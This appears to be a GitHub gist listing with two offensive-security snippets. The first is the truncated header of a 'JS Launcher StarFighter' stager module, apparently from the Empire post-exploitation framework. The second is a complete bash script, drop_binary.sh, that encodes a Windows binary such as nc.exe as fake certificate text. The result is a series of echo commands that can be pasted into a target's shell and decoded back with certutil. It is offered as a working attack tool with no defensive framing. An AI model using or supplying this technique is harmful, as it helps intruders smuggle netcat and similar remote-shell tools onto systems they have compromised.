This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from lib.common import helpers | |
class Stager: | |
def __init__(self, mainMenu, params=[]): | |
self.info = { | |
'Name': 'JS Launcher StarFighter', | |
'Author': ['Cn33liz'], |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# drop_binary.sh | |
# ./drop_binary.sh /usr/share/windows-binaries/nc.exe nc.txt | |
# certutil -decode encoded.txt decoded.bin | |
echo "-----BEGIN CERTIFICATE-----" > $2 | |
cat $1 | base64 >> $2 | |
echo "-----END CERTIFICATE-----" >> $2 | |
sed -i 's/^/echo /g' $2 && sed -i 's/$/ >> encoded.txt/g' $2 |
NewerOlder